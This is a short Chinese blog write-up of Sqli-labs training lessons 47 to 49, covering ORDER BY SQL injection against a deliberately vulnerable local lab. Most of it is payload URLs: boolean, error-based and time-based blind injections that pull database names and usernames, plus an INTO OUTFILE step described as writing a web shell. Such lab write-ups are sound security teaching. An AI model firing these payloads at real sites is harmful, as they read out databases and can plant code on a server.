• SQL注入之Sqli-labs系列第四十七关,第四十八关,第四十九关(ORDER BY注入)


    0x1 源码区别点

    将id变为字符型:
    $sql = "SELECT * FROM users ORDER BY '$id'";

    0x2实例测试

    (1)and rand相结合的方式

    payload:
    http://localhost/sqli-labs-master/Less-47/?sort=1' and rand(ascii(left(database(),1))=116)--+ 

    (2)利用报错的方式进行

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select 1 from(select count(*),concat(0x5c,database(),0x5c,floor(rand(0)*2))x from information_schema.tables group by x)a)--+

    网上摘录语句:
    http://localhost/sqli-labs-master/Less-47/?sort=1' and (select count(*) from information_schema.columns group by concat(0x3e,0x3e,(select database()),0x3e,0x3e,floor(rand()*2)) limit 0,1)--+

     

    (3)另类报错语句

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+  

    (4)延迟注入 

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (if(ascii(substr(database(),1,1))=116,0,sleep(5)))--+  

    (5)使用into outfile导出文件

    http://localhost:81/sqli-labs-master/Less-47/index.php?sort=1' into outfile "C:/testphp/Apache24/htdocs/sqli-labs-master/Less-47/test.txt" 

    进行网马写入

    后面的十六进制是<? php phpinfo();?>

    0x3第四十八关

    这关和第四十七关的区别在于没有报错信息,也可以采用into outfile

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+  

    0x4第四十九关

    这关和第四十七关的区别在于没有报错信息 

    http://192.168.232.135/sqli-labs-master/Less-49/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+  
  • 相关阅读:
    6993: Dominoes(纯bfs)
    PHP学习笔记
    Android学习笔记
    大数据(笔记)
    第七周进度总结
    记账本NABCD分析
    第七周学习进度总结
    《构建之法》读书笔记(一)
    jdbc 连接数据库
    4月10日随笔
  • 原文地址:https://www.cnblogs.com/AmoBlogs/p/8725793.html
Copyright © 2020-2023  润新知